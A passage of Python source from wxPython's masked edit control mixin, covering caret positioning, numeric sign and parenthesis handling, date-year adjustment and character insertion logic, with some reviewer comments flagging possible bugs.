## dbg('choice: "%s" - no match' % choice)
pass
if match is not None:
## dbg('matched', match)
pass
else:
## dbg('no match found')
pass
## dbg(indent=0)
return (match, partial_match)
    def _AdjustField(self, pos):
        """
        This function gets called by default whenever the cursor leaves a field.
        The pos argument given is the char position before leaving that field.
        By default, floating point, integer and date values are adjusted to be
        legal in this function. Derived classes may override this function
        to modify the value of the control in a different way when changing fields.
        NOTE: these change the value immediately, and restore the cursor to
        the passed location, so that any subsequent code can then move it
        based on the operation being performed.
        """
        newvalue = value = self._GetValue()
        field = self._FindField(pos)
        # NOTE(review): _FindFieldExtent is called without pos — it
        # presumably falls back to the current insertion point; confirm
        # that matches the intent for this pos argument.
        start, end, slice = self._FindFieldExtent(getslice=True)
        newfield = field._AdjustField(slice)
        newvalue = value[:start] + newfield + value[end:]
        if self._isFloat and newvalue != self._template:
            newvalue = self._adjustFloat(newvalue)
        # NOTE(review): the int and date branches adjust the original
        # `value`, not `newvalue`, discarding the field-level adjustment
        # above — looks intentional for whole-control adjusters, but
        # confirm before changing.
        if self._ctrl_constraints._isInt and value != self._template:
            newvalue = self._adjustInt(value)
        if self._isDate and value != self._template:
            newvalue = self._adjustDate(value, fixcentury=True)
            if self._4digityear:
                year2dig = self._dateExtent - 2
                # if century was filled in, keep the caret on the same digit:
                if pos == year2dig and value[year2dig] != newvalue[year2dig]:
                    pos = pos+2
        if newvalue != value:
## dbg('old value: "%s"\nnew value: "%s"' % (value, newvalue))
            self._SetValue(newvalue)
            self._SetInsertionPoint(pos)
def _adjustKey(self, pos, key):
""" Apply control formatting to the key (e.g. convert to upper etc). """
field = self._FindField(pos)
if field._forceupper and key in range(97,123):
key = ord( chr(key).upper())
if field._forcelower and key in range(65,90):
key = ord( chr(key).lower())
return key
    def _adjustPos(self, pos, key):
        """
        Checks the current insertion point position and adjusts it if
        necessary to skip over non-editable characters.

        Handles the reserved sign positions of signed numeric masks,
        right-insert fields (where the caret is pulled to the field's
        right edge), and template characters (where the caret is pushed
        to the next editable position).  May also move the real insertion
        point / selection as a side effect.  Returns the adjusted position.
        """
## dbg('_adjustPos', pos, key, indent=1)
        sel_start, sel_to = self._GetSelection()
        # If a numeric or decimal mask, and negatives allowed, reserve the
        # first space for sign, and last one if using parens.
        if( self._signOk
            and ((pos == self._signpos and key in (ord('-'), ord('+'), ord(' ')) )
                 or (self._useParens and pos == self._masklength -1))):
## dbg('adjusted pos:', pos, indent=0)
            return pos
        if key not in self._nav:
            field = self._FindField(pos)
## dbg('field._insertRight?', field._insertRight)
## if self._signOk: dbg('self._signpos:', self._signpos)
            if field._insertRight: # if allow right-insert
                start, end = field._extent
                slice = self._GetValue()[start:end].strip()
                field_len = end - start
                if pos == end: # if cursor at right edge of field
                    # if not filled or supposed to stay in field, keep current position
#### dbg('pos==end')
#### dbg('len (slice):', len(slice))
#### dbg('field_len?', field_len)
#### dbg('pos==end; len (slice) < field_len?', len(slice) < field_len)
#### dbg('not field._moveOnFieldFull?', not field._moveOnFieldFull)
                    if( len(slice) == field_len and field._moveOnFieldFull
                        and (not field._stopFieldChangeIfInvalid or
                             field._stopFieldChangeIfInvalid and field.IsValid(slice))):
                        # move cursor to next field:
                        pos = self._findNextEntry(pos)
                        self._SetInsertionPoint(pos)
                        if pos < sel_to:
                            self._SetSelection(pos, sel_to) # restore selection
                        else:
                            self._SetSelection(pos, pos) # remove selection
                    else: # leave cursor alone
                        pass
                else:
                    # if at start of control, move to right edge
                    if (sel_to == sel_start
                        and (self._isTemplateChar(pos) or (pos == start and len(slice)+ 1 < field_len))
                        and pos != end):
                        pos = end # move to right edge
##                    elif sel_start <= start and sel_to == end:
##                        # select to right edge of field - 1 (to replace char)
##                        pos = end - 1
##                        self._SetInsertionPoint(pos)
##                        # restore selection
##                        self._SetSelection(sel_start, pos)
                    # if selected to beginning and signed, and not changing sign explicitly:
                    elif self._signOk and sel_start == 0 and key not in (ord('-'), ord('+'), ord(' ')):
                        # adjust to past reserved sign position:
                        pos = self._fields[0]._extent[0]
## dbg('adjusting field to ', pos)
                        self._SetInsertionPoint(pos)
                        # but keep original selection, to allow replacement of any sign:
                        self._SetSelection(0, sel_to)
                    else:
                        pass # leave position/selection alone
            # else make sure the user is not trying to type over a template character
            # If they are, move them to the next valid entry position
            elif self._isTemplateChar(pos):
                # NOTE(review): in this branch `start`/`end` were never
                # assigned (they are only set in the insertRight branch
                # above), so the IsValid slice below would raise NameError
                # if field._stopFieldChangeIfInvalid is set — presumably
                # field._extent was intended; confirm before fixing.
                if( (not field._moveOnFieldFull
                     and (not self._signOk
                          or (self._signOk and field._index == 0 and pos > 0) ) )
                    or (field._stopFieldChangeIfInvalid
                        and not field.IsValid(self._GetValue()[start:end]) ) ):
                    # don't move to next field without explicit cursor movement
                    pass
                else:
                    # find next valid position
                    pos = self._findNextEntry(pos)
                    self._SetInsertionPoint(pos)
                    if pos < sel_to: # restore selection
                        self._SetSelection(pos, sel_to)
                    else:
                        self._SetSelection(pos, pos)
## dbg('adjusted pos:', pos, indent=0)
        return pos
    def _adjustFloat(self, candidate=None):
        """
        'Fixes' an floating point control. Collapses spaces, right-justifies, etc.

        Works on *candidate* if given, else on the control's current
        value.  Right-justifies the integer part, zero-pads the fraction,
        re-applies the sign/parens, and aligns on the decimal position.
        When operating on the current value the fixed string is also
        queued via wx.CallAfter(self._SetValue).  Returns the fixed string.
        """
## dbg('MaskedEditMixin::_adjustFloat, candidate = "%s"' % candidate, indent=1)
        lenInt,lenFraction = [len(s) for s in self._mask.split('.')] ## Get integer, fraction lengths
        if candidate is None: value = self._GetValue()
        else: value = candidate
## dbg('value = "%(value)s"' % locals(), 'len(value):', len(value))
        intStr, fracStr = value.split(self._decimalChar)
        intStr = self._fields[0]._AdjustField(intStr)
## dbg('adjusted intStr: "%s"' % intStr)
        lenInt = len(intStr)
        fracStr = fracStr + ('0'*(lenFraction-len(fracStr))) # add trailing spaces to decimal
## dbg('intStr "%(intStr)s"' % locals())
## dbg('lenInt:', lenInt)
        intStr = string.rjust( intStr[-lenInt:], lenInt)
## dbg('right-justifed intStr = "%(intStr)s"' % locals())
        newvalue = intStr + self._decimalChar + fracStr
        if self._signOk:
            # make room for, and re-derive, the sign character(s):
            if len(newvalue) < self._masklength:
                newvalue = ' ' + newvalue
            signedvalue = self._getSignedValue(newvalue)[0]
            if signedvalue is not None: newvalue = signedvalue
        # Finally, align string with decimal position, left-padding with
        # fillChar:
        newdecpos = newvalue.find(self._decimalChar)
        if newdecpos < self._decimalpos:
            padlen = self._decimalpos - newdecpos
            newvalue = string.join([' ' * padlen] + [newvalue] ,'')
        if self._signOk and self._useParens:
            # keep the reserved rightmost slot: ')' for negatives, blank otherwise
            if newvalue.find('(') != -1:
                newvalue = newvalue[:-1] + ')'
            else:
                newvalue = newvalue[:-1] + ' '
## dbg('newvalue = "%s"' % newvalue)
        if candidate is None:
            wx.CallAfter(self._SetValue, newvalue)
## dbg(indent=0)
        return newvalue
    def _adjustInt(self, candidate=None):
        """ 'Fixes' an integer control. Collapses spaces, right or left-justifies.

        Works on *candidate* if given, else on the control's current
        value.  Re-applies the '-' or '(...)' sign decoration according
        to self._isNeg / self._useParens, reserves the sign column(s),
        then justifies per the field's alignment.  When operating on the
        current value the result is also queued via wx.CallAfter.
        Returns the fixed string.
        """
## dbg("MaskedEditMixin::_adjustInt", candidate)
        lenInt = self._masklength
        if candidate is None: value = self._GetValue()
        else: value = candidate
        intStr = self._fields[0]._AdjustField(value)
        intStr = intStr.strip() # drop extra spaces
## dbg('adjusted field: "%s"' % intStr)
        if self._isNeg and intStr.find('-') == -1 and intStr.find('(') == -1:
            # negative but not yet decorated: add parens or leading minus
            if self._useParens:
                intStr = '(' + intStr + ')'
            else:
                intStr = '-' + intStr
        elif self._isNeg and intStr.find('-') != -1 and self._useParens:
            # convert a '-' decoration to paren style:
            intStr = intStr.replace('-', '(')
        if( self._signOk and ((self._useParens and intStr.find('(') == -1)
                              or (not self._useParens and intStr.find('-') == -1))):
            # positive value in a signed mask: reserve the sign column(s)
            intStr = ' ' + intStr
            if self._useParens:
                intStr += ' ' # space for right paren position
        elif self._signOk and self._useParens and intStr.find('(') != -1 and intStr.find(')') == -1:
            # ensure closing right paren:
            intStr += ')'
        if self._fields[0]._alignRight: ## Only if right-alignment is enabled
            intStr = intStr.rjust( lenInt )
        else:
            intStr = intStr.ljust( lenInt )
        if candidate is None:
            wx.CallAfter(self._SetValue, intStr )
        return intStr
def _adjustDate(self, candidate=None, fixcentury=False, force4digit_year=False):
"""
'Fixes' a date control, expanding the year if it can.
Applies various self-formatting options.
"""
## dbg("MaskedEditMixin::_adjustDate", indent=1)
if candidate is None: text = self._GetValue()
else: text = candidate
## dbg('text=', text)
if self._datestyle == "YMD":
year_field = 0
else:
year_field = 2
## dbg('getYear: "%s"' % _getYear(text, self._datestyle))
year = string.replace( _getYear( text, self._datestyle),self._fields[year_field]._fillChar,"") # drop extra fillChars
month = _getMonth( text, self._datestyle)
day = _getDay( text, self._datestyle)
## dbg('self._datestyle:', self._datestyle, 'year:', year, 'Month', month, 'day:', day)
yearVal = None
yearstart = self._dateExtent - 4
if( len(year) < 4
and (fixcentury
or force4digit_year
or (self._GetInsertionPoint() > yearstart+1 and text[yearstart+2] == ' ')
or (self._GetInsertionPoint() > yearstart+2 and text[yearstart+3] == ' ') ) ):
## user entered less than four digits and changing fields or past point where we could
## enter another digit:
try:
yearVal = int(year)
except:
## dbg('bad year=', year)
year = text[yearstart:self._dateExtent]
if len(year) < 4 and yearVal:
if len(year) == 2:
# Fix year adjustment to be less "20th century" :-) and to adjust heuristic as the
# years pass...
now = wx.DateTime_Now()
century = (now.GetYear() /100) * 100 # "this century"
twodig_year = now.GetYear() - century # "this year" (2 digits)
# if separation between today's 2-digit year and typed value > 50,
# assume last century,
# else assume this century.
#
# Eg: if 2003 and yearVal == 30, => 2030
# if 2055 and yearVal == 80, => 2080
# if 2010 and yearVal == 96, => 1996
#
if abs(yearVal - twodig_year) > 50:
yearVal = (century - 100) + yearVal
else:
yearVal = century + yearVal
year = str( yearVal )
else: # pad with 0's to make a 4-digit year
year = "%04d" % yearVal
if self._4digityear or force4digit_year:
text = _makeDate(year, month, day, self._datestyle, text) + text[self._dateExtent:]
## dbg('newdate: "%s"' % text, indent=0)
return text
    def _goEnd(self, getPosOnly=False):
        """ Moves the insertion point to the end of user-entry

        Scans backward for the last non-blank maskable character; the
        target position is just past it.  If nothing has been entered,
        falls back to _goHome()'s position.  For right-insert fields the
        caret is pushed to the field's right edge.  When getPosOnly is
        True the position is returned instead of being applied.
        """
## dbg("MaskedEditMixin::_goEnd; getPosOnly:", getPosOnly, indent=1)
        text = self._GetValue()
#### dbg('text: "%s"' % text)
        i = 0
        if len(text.rstrip()):
            # walk backward from the last possible position; stop just past
            # the last filled editable char:
            for i in range( min( self._masklength-1, len(text.rstrip())), -1, -1):
#### dbg('i:', i, 'self._isMaskChar(%d)' % i, self._isMaskChar(i))
                if self._isMaskChar(i):
                    char = text[i]
#### dbg("text[%d]: '%s'" % (i, char))
                    if char != ' ':
                        i += 1
                        break
        if i == 0:
            pos = self._goHome(getPosOnly=True)
        else:
            pos = min(i,self._masklength)
        field = self._FindField(pos)
        start, end = field._extent
        if field._insertRight and pos < end:
            pos = end
## dbg('next pos:', pos)
## dbg(indent=0)
        if getPosOnly:
            return pos
        else:
            self._SetInsertionPoint(pos)
def _goHome(self, getPosOnly=False):
""" Moves the insertion point to the beginning of user-entry """
## dbg("MaskedEditMixin::_goHome; getPosOnly:", getPosOnly, indent=1)
text = self._GetValue()
for i in range(self._masklength):
if self._isMaskChar(i):
break
pos = max(i, 0)
## dbg(indent=0)
if getPosOnly:
return pos
else:
self._SetInsertionPoint(max(i,0))
    def _getAllowedChars(self, pos):
        """ Returns a string of all allowed user input characters for the provided
            mask character plus control options

        Looks up the mask character at *pos* in maskchardict, then widens
        the set with a space (if the field allows spaces) and any
        field-specific extra characters.
        """
        maskChar = self.maskdict[pos]
        okchars = self.maskchardict[maskChar] ## entry, get mask approved characters
        # convert okchars to unicode if required; will force subsequent appendings to
        # result in unicode strings
        # (Python 2-only: types.UnicodeType does not exist on Python 3)
        if 'unicode' in wx.PlatformInfo and type(okchars) != types.UnicodeType:
            okchars = okchars.decode(self._defaultEncoding)
        field = self._FindField(pos)
        if okchars and field._okSpaces: ## Allow spaces?
            okchars += " "
        if okchars and field._includeChars: ## any additional included characters?
            okchars += field._includeChars
#### dbg('okchars[%d]:' % pos, okchars)
        return okchars
def _isMaskChar(self, pos):
    """ Returns True if the char at position pos is a special mask character (e.g. NCXaA#)
    """
    # Positions past the end of the mask are never editable.
    return pos < self._masklength and self._ismasked[pos]
def _isTemplateChar(self,Pos):
    """ Returns True if the char at position pos is a template character (e.g. -not- NCXaA#)
    """
    # Out-of-range positions are neither mask nor template characters.
    if Pos >= self._masklength:
        return False
    return not self._isMaskChar(Pos)
def _isCharAllowed(self, char, pos, checkRegex=False, allowAutoSelect=True, ignoreInsertRight=False):
    """ Returns True if character is allowed at the specific position, otherwise False.

    For right-insert fields the effective position may be shifted to the
    field's right edge before the check.  If checkRegex is True, the
    prospective new value is also matched against any field/control regex
    filters.
    """
    field = self._FindField(pos)
    right_insert = False

    if self.controlInitialized:
        sel_start, sel_to = self._GetSelection()
    else:
        sel_start, sel_to = pos, pos

    if (field._insertRight or self._ctrl_constraints._insertRight) and not ignoreInsertRight:
        start, end = field._extent
        field_len = end - start
        if self.controlInitialized:
            value = self._GetValue()
            fstr = value[start:end].strip()
            if field._padZero:
                while fstr and fstr[0] == '0':
                    fstr = fstr[1:]
            input_len = len(fstr)
            if self._signOk and '-' in fstr or '(' in fstr:
                input_len -= 1  # sign can move out of field, so don't consider it in length
        else:
            value = self._template
            input_len = 0   # can't get the current "value", so use 0

        # if entire field is selected or position is at end and field is not full,
        # or if allowed to right-insert at any point in field and field is not full and cursor is not at a fillChar
        # or the field is a singleton integer field and is currently 0 and we're at the end:
        if( (sel_start, sel_to) == field._extent
            or (pos == end and ((input_len < field_len)
                                 or (field_len == 1
                                     and input_len == field_len
                                     and field._isInt
                                     and value[end-1] == '0'
                                     )
                                ) ) ):
            pos = end - 1
            right_insert = True
        elif( field._allowInsert and sel_start == sel_to
              and (sel_to == end or (sel_to < self._masklength and value[sel_start] != field._fillChar))
              and input_len < field_len ):
            pos = sel_to - 1    # where character will go
            right_insert = True
        # else leave pos alone...
        else:
            pass

    if self._isTemplateChar( pos ):   ## if a template character, return empty
        return False

    if self._isMaskChar( pos ):
        okChars  = self._getAllowedChars(pos)

        if self._fields[0]._groupdigits and (self._isInt or (self._isFloat and pos < self._decimalpos)):
            okChars += self._fields[0]._groupChar

        if self._signOk:
            if self._isInt or (self._isFloat and pos < self._decimalpos):
                okChars += '-'
                if self._useParens:
                    okChars += '('
            elif self._useParens and (self._isInt or (self._isFloat and pos > self._decimalpos)):
                okChars += ')'

        # '*' in the mask accepts any character
        approved = (self.maskdict[pos] == '*' or char in okChars)

        if approved and checkRegex:
            # Simulate the insertion, then validate the prospective value
            # against any per-field and control-wide regex filters.
            value = self._eraseSelection(self._GetValue())

            if right_insert:
                # move the position to the right side of the insertion:
                at = pos+1
            else:
                at = pos
            if allowAutoSelect:
                newvalue, ignore, ignore, ignore, ignore = self._insertKey(char, at, sel_start, sel_to, value, allowAutoSelect=True)
            else:
                newvalue, ignore = self._insertKey(char, at, sel_start, sel_to, value)

            fields = [self._FindField(pos)] + [self._ctrl_constraints]
            for field in fields:    # includes fields[-1] == "ctrl_constraints"
                if field._regexMask and field._filter:
                    start, end = field._extent
                    slice = newvalue[start:end]
                    approved = (re.match( field._filter, slice) is not None)
                    if not approved: break
        return approved
    else:
        return False
def _applyFormatting(self):
    """ Apply formatting depending on the control's state.

    Updates the negative-value flag from the current signed text, then sets
    foreground/background colours according to sign and validity, and
    refreshes the control.

    Need to find a way to call this whenever the value changes, in case the control's
    value has been changed or set programatically.
    """
    # Handle negative numbers: resync the cached sign position and flag.
    if self._signOk:
        text, signpos, right_signpos = self._getSignedValue()
        if text and signpos != self._signpos:
            self._signpos = signpos
        if not text or text[signpos] not in ('-','('):
            self._isNeg = False
        elif text and self._valid and not self._isNeg and text[signpos] in ('-', '('):
            self._isNeg = True

    # Foreground: special colour for negative numeric values.
    if self._signOk and self._isNeg:
        fc = self._signedForegroundColour
    else:
        fc = self._foregroundColour

    if hasattr(fc, '_name'):
        c = fc._name
    else:
        c = fc
    self.SetForegroundColour(fc)

    # Background: distinguish empty / valid / invalid states.
    if self._valid:
        if self.IsEmpty():
            bc = self._emptyBackgroundColour
        else:
            bc = self._validBackgroundColour
    else:
        bc = self._invalidBackgroundColour
    if hasattr(bc, '_name'):
        c = bc._name
    else:
        c = bc
    self.SetBackgroundColour(bc)
    self._Refresh()
def _getAbsValue(self, candidate=None):
    """ Return an unsigned value (i.e. strip the '-' prefix if any), and sign position(s).

    Returns a 3-tuple (text, signpos, right_signpos) where text is the
    value with the sign character(s) blanked out (or None if the text is
    not a parseable number), signpos is the position reserved for the
    leading '-'/'(' and right_signpos the position for a trailing ')'
    (-1 when not applicable).
    """
    if candidate is None: text = self._GetValue()
    else: text = candidate
    right_signpos = text.find(')')

    if self._isInt:
        if self._ctrl_constraints._alignRight and self._fields[0]._fillChar == ' ':
            # right-aligned, space-filled: look for an explicit sign char
            signpos = text.find('-')
            if signpos == -1:
                signpos = text.find('(')
            elif signpos != -1:
                pass

            if signpos == -1:
                # no sign present; normalize the text width to the mask length
                if len(text) < self._masklength:
                    text = ' ' + text
                if len(text) < self._masklength:
                    text += ' '
                if len(text) > self._masklength and text[-1] in (')', ' '):
                    text = text[:-1]
        else:
            # left-aligned/zero-filled: sign slot is the char just before
            # the first non-blank character
            signpos = len(text) - (len(text.lstrip()) + 1)
            if self._useParens and not text.strip():
                signpos -= 1    # empty value; use penultimate space
        if signpos >= 0:
            # blank out the leading sign position
            text = text[:signpos] + ' ' + text[signpos+1:]
        else:
            if self._signOk:
                signpos = 0
                text = self._template[0] + text[1:]
            else:
                signpos = -1

        if right_signpos != -1:
            if self._signOk:
                text = text[:right_signpos] + ' ' + text[right_signpos+1:]
            elif len(text) > self._masklength:
                text = text[:right_signpos] + text[right_signpos+1:]
                right_signpos = -1
        elif self._useParens and self._signOk:
            # figure out where it ought to go:
            right_signpos = self._masklength - 1        # initial guess
            if not self._ctrl_constraints._alignRight:
                if len(text.strip()) == 0:
                    right_signpos = signpos + 1
                elif len(text.strip()) < self._masklength:
                    right_signpos = len(text.rstrip())

        groupchar = self._fields[0]._groupChar
        try:
            value = long(text.replace(groupchar,'').replace('(','-').replace(')','').replace(' ', ''))
        except:
            # not a parseable integer
            return None, signpos, right_signpos

    else:   # float value
        try:
            groupchar = self._fields[0]._groupChar
            value = float(text.replace(groupchar,'').replace(self._decimalChar, '.').replace('(', '-').replace(')','').replace(' ', ''))
        except:
            value = None

        # NOTE(review): `value < 0 and value is not None` relies on
        # Python 2's None < 0 ordering; evaluation order looks inverted
        # but the net result is False when value is None.
        if value < 0 and value is not None:
            signpos = text.find('-')
            if signpos == -1:
                signpos = text.find('(')

            text = text[:signpos] + self._template[signpos] + text[signpos+1:]
        else:
            # look forwards up to the decimal point for the 1st non-digit
            if self._signOk:
                signpos = self._decimalpos - (len(text[:self._decimalpos].lstrip()) + 1)
                # prevent checking for empty string - Tomo - Wed 14 Jan 2004 03:19:09 PM CET
                if len(text) >= signpos+1 and text[signpos+1] in ('-','('):
                    signpos += 1
            else:
                signpos = -1

        if self._useParens:
            if self._signOk:
                right_signpos = self._masklength - 1
                text = text[:right_signpos] + ' '
                if text[signpos] == '(':
                    text = text[:signpos] + ' ' + text[signpos+1:]
            else:
                right_signpos = text.find(')')
                if right_signpos != -1:
                    text = text[:-1]
                    right_signpos = -1

        if value is None:
            text = None

    return text, signpos, right_signpos
def _getSignedValue(self, candidate=None):
    """ Return a signed value by adding a "-" prefix if the value
    is set to negative, or a space if positive.

    Returns the same (text, signpos, right_signpos) tuple shape as
    _getAbsValue(); text is None if the value is not a parseable number.
    """
    if candidate is None: text = self._GetValue()
    else: text = candidate

    abstext, signpos, right_signpos = self._getAbsValue(text)
    if self._signOk:
        if abstext is None:
            # not a valid number; propagate as-is
            return abstext, signpos, right_signpos

        if self._isNeg or text[signpos] in ('-', '('):
            if self._useParens:
                sign = '('
            else:
                sign = '-'
        else:
            sign = ' '
        if abstext[signpos] not in string.digits:
            text = abstext[:signpos] + sign + abstext[signpos+1:]
        else:
            # this can happen if value passed is too big; sign assumed to be
            # in position 0, but if already filled with a digit, prepend sign...
            text = sign + abstext
        if self._useParens and text.find('(') != -1:
            text = text[:right_signpos] + ')' + text[right_signpos+1:]
    else:
        text = abstext
    return text, signpos, right_signpos
def GetPlainValue(self, candidate=None):
    """ Returns control's value stripped of the template text.
    plainvalue = MaskedEditMixin.GetPlainValue()
    """
    if candidate is None:
        text = self._GetValue()
    else:
        text = candidate

    if self.IsEmpty():
        return ""

    # Keep only the characters occupying editable (mask) positions.
    limit = min(len(self._template), len(text))
    plain = "".join([text[idx] for idx in range(limit)
                     if self._mask[idx] in maskchars])

    if self._isFloat or self._isInt:
        # Regularize parenthesized negatives into '-' form.
        plain = plain.replace('(', '-').replace(')', ' ')
        if self._signOk and self._isNeg and plain.count('-') == 0:
            # sign must be in a reserved position outside the mask; add it back
            plain = '-' + plain.strip()
        if self._fields[0]._alignRight:
            # preserve overall width: one leading space per removed group char
            plain = ' ' * plain.count(',') + plain.replace(',', '')
        else:
            plain = plain.replace(',', '')

    return plain.rstrip()
def IsEmpty(self, value=None):
    """
    Returns True if control is equal to an empty value.
    (Empty means all editable positions in the template == fillChar.)
    """
    if value is None:
        value = self._GetValue()

    if value != self._template:
        # any deviation from the template means user data is present
        return False
    if not self._defaultValue:
        # template with no default: all mask chars == fillChar by definition
        return True
    # Value matches the template but a default value exists: verify every
    # editable position still holds a blank or fill character.
    for pos in range(len(self._template)):
        if self._isMaskChar(pos) and value[pos] not in (' ', self._fillChar[pos]):
            return False
    return True
def IsDefault(self, value=None):
    """
    Returns True if the value specified (or the value of the control if not specified)
    is equal to the default value.
    """
    # The default presentation is the bare template.
    if value is not None:
        return value == self._template
    return self._GetValue() == self._template
def IsValid(self, value=None):
    """ Indicates whether the value specified (or the current value of the control
    if not specified) is considered valid."""
    # Delegate the actual check (and its colouring side effects) to _CheckValid.
    if value is None:
        value = self._GetValue()
    return self._CheckValid(value)
def _eraseSelection(self, value=None, sel_start=None, sel_to=None):
    """ Used to blank the selection when inserting a new character.

    Returns a copy of *value* with the selected range [sel_start, sel_to)
    reset: sign characters are blanked (keeping parentheses balanced),
    editable positions revert to '0' (zero-padded fields) or the template
    character; template positions are left untouched.
    """
    if value is None: value = self._GetValue()
    if sel_start is None or sel_to is None:
        sel_start, sel_to = self._GetSelection()    ## check for a range of selected text

    newvalue = list(value)
    for i in range(sel_start, sel_to):
        if self._signOk and newvalue[i] in ('-', '(', ')'):
            # balance parentheses: erasing one side blanks the other too
            if newvalue[i] == '(':
                right_signpos = value.find(')')
                if right_signpos != -1:
                    newvalue[right_signpos] = ' '
            elif newvalue[i] == ')':
                left_signpos = value.find('(')
                if left_signpos != -1:
                    newvalue[left_signpos] = ' '
            newvalue[i] = ' '
        elif self._isMaskChar(i):
            field = self._FindField(i)
            if field._padZero:
                newvalue[i] = '0'
            else:
                newvalue[i] = self._template[i]

    # str.join is the idiomatic (and Python-3-compatible) replacement for
    # the deprecated string.join() helper; behavior is identical.
    value = "".join(newvalue)
    return value
def _insertKey(self, char, pos, sel_start, sel_to, value, allowAutoSelect=False):
    """ Handles replacement of the character at the current insertion point.

    Computes the new control text resulting from typing *char* at *pos*
    with the selection [sel_start, sel_to), honoring right-insert fields,
    zero padding, sign/parenthesis balancing and auto-completion.

    Returns (newtext, newpos) normally, or
    (newtext, newpos, new_select_to, match_field, match_index) when
    allowAutoSelect is True.
    """
    text = self._eraseSelection(value)
    field = self._FindField(pos)
    start, end = field._extent
    newtext = ""
    newpos = pos

    # if >= 2 chars selected in a right-insert field, do appropriate erase on field,
    # then set selection to end, and do usual right insert.
    if sel_start != sel_to and sel_to >= sel_start+2:
        field = self._FindField(sel_start)
        if( field._insertRight                          # if right-insert
            and field._allowInsert                      # and allow insert at any point in field
            and field == self._FindField(sel_to) ):     # and selection all in same field
            text = self._OnErase(just_return_value=True)    # remove selection before insert
            pos = sel_start = sel_to

    if pos != sel_start and sel_start == sel_to:
        # adjustpos must have moved the position; make selection match:
        sel_start = sel_to = pos

    if sel_start < end:
        pass

    # Right-insert path: shift the field's contents left and append at the
    # right edge.
    if( field._insertRight                                  # field allows right insert
        and ((sel_start, sel_to) == field._extent           # and whole field selected
             or (sel_start == sel_to                        # or nothing selected
                 and (sel_start == end                      # and cursor at right edge
                      or (field._allowInsert                # or field allows right-insert
                          and sel_start < end               # next to other char in field:
                          and text[sel_start] != field._fillChar) ) ) ) ):
        fstr = text[start:end]
        erasable_chars = [field._fillChar, ' ']

        # if zero padding field, or a single digit, and currently a value of 0, allow erasure of 0:
        if field._padZero or (field._isInt and (end - start == 1) and fstr[0] == '0'):
            erasable_chars.append('0')

        erased = ''
        if fstr[0] in erasable_chars or (self._signOk and field._index == 0 and fstr[0] in ('-','(')):
            erased = fstr[0]

        field_sel_start = sel_start - start
        field_sel_to = sel_to - start

        # drop the leftmost (erased) char, insert the new one at the cursor
        fstr = fstr[1:field_sel_start] + char + fstr[field_sel_to:end]

        if field._alignRight and sel_start != sel_to:
            field_len = end - start
            pos = sel_to
            if field._padZero:
                fstr = '0' * (field_len - len(fstr)) + fstr
            else:
                fstr = fstr.rjust(field_len)   # adjust the field accordingly
        newtext = text[:start] + fstr + text[end:]
        if erased in ('-', '(') and self._signOk:
            # re-prepend an erased sign character
            newtext = erased + newtext[1:]

        if self._signOk and field._index == 0:
            start -= 1             # account for sign position

        if( field._moveOnFieldFull and pos == end
            and len(fstr.lstrip()) == end-start     # if field now full
            and (not field._stopFieldChangeIfInvalid    # and we either don't care about valid
                 or (field._stopFieldChangeIfInvalid    # or we do and the current field value is valid
                     and field.IsValid(fstr)))):
            newpos = self._findNextEntry(end)       # go to next field
        else:
            newpos = pos                            # else keep cursor at current position

    # Left-insert / plain-replace path (right-insert case above didn't apply):
    if not newtext:
        if newpos != pos:
            pass
        if self._signOk and self._useParens:
            # remember where the right paren is presently, if any
            old_right_signpos = text.find(')')

        if field._allowInsert and not field._insertRight and sel_to <= end and sel_start >= start:
            # inserting within a left-insert-capable field: shift the tail right
            field_len = end - start
            before = text[start:sel_start]
            after = text[sel_to:end].strip()
            new_len = len(before) + len(after) + 1 # (for inserted char)
            if new_len < field_len:
                retained = after + self._template[end-(field_len-new_len):end]
            elif new_len > end-start:
                retained = after[1:]
            else:
                retained = after

            left = text[0:start] + before
            right = retained + text[end:]
        else:
            # plain overwrite of the char at pos
            left = text[0:pos]
            right = text[pos+1:]

        if 'unicode' in wx.PlatformInfo and type(char) != types.UnicodeType:
            # convert the keyboard constant to a unicode value, to
            # ensure it can be concatenated into the control value:
            char = char.decode(self._defaultEncoding)

        newtext = left + char + right

        if self._signOk and self._useParens:
            # Balance parentheses:
            left_signpos = newtext.find('(')

            if left_signpos == -1:     # erased '('; remove ')'
                right_signpos = newtext.find(')')
                if right_signpos != -1:
                    newtext = newtext[:right_signpos] + ' ' + newtext[right_signpos+1:]

            elif old_right_signpos != -1:
                right_signpos = newtext.find(')')

                if right_signpos == -1: # just replaced right-paren
                    if newtext[pos] == ' ': # we just erased '); erase '('
                        newtext = newtext[:left_signpos] + ' ' + newtext[left_signpos+1:]
                    else:   # replaced with digit; move ') over
                        if self._ctrl_constraints._alignRight or self._isFloat:
                            newtext = newtext[:-1] + ')'
                        else:
                            rstripped_text = newtext.rstrip()
                            right_signpos = len(rstripped_text)
                            newtext = newtext[:right_signpos] + ')' + newtext[right_signpos+1:]

        if( field._insertRight                                  # if insert-right field (but we didn't start at right edge)
            and field._moveOnFieldFull                          # and should move cursor when full
            and len(newtext[start:end].strip()) == end-start    # and field now full
            and (not field._stopFieldChangeIfInvalid            # and we either don't care about valid
                 or (field._stopFieldChangeIfInvalid            # or we do and the current field value is valid
                     and field.IsValid(newtext[start:end].strip())))):
            newpos = self._findNextEntry(end)                   # go to next field
        else:
            newpos = pos+1

    if allowAutoSelect:
        new_select_to = newpos     # (default return values)
        match_field = None
        match_index = None

        if field._autoSelect:
            match_index, partial_match = self._autoComplete(1,  # (always forward)
                                                            field._compareChoices,
                                                            newtext[start:end],
                                                            compareNoCase=field._compareNoCase,
                                                            current_index = field._autoCompleteIndex-1)
            if match_index is not None and partial_match:
                matched_str = newtext[start:end]
                newtext = newtext[:start] + field._choices[match_index] + newtext[end:]
                new_select_to = end
                match_field = field
                if field._insertRight:
                    # adjust position to just after partial match in field
                    newpos = end - (len(field._choices[match_index].strip()) - len(matched_str.strip()))
        elif self._ctrl_constraints._autoSelect:
            match_index, partial_match = self._autoComplete(
                                            1, # (always forward)
                                            self._ctrl_constraints._compareChoices,
                                            newtext,
                                            self._ctrl_constraints._compareNoCase,
                                            current_index = self._ctrl_constraints._autoCompleteIndex - 1)
            if match_index is not None and partial_match:
                matched_str = newtext
                newtext = self._ctrl_constraints._choices[match_index]
                edit_end = self._ctrl_constraints._extent[1]
                new_select_to = min(edit_end, len(newtext.rstrip()))
                match_field = self._ctrl_constraints
                if self._ctrl_constraints._insertRight:
                    # adjust position to just after partial match in control:
                    newpos = self._masklength - (len(self._ctrl_constraints._choices[match_index].strip()) - len(matched_str.strip()))

        return newtext, newpos, new_select_to, match_field, match_index
    else:
        return newtext, newpos
def _OnFocus(self,event):
    """
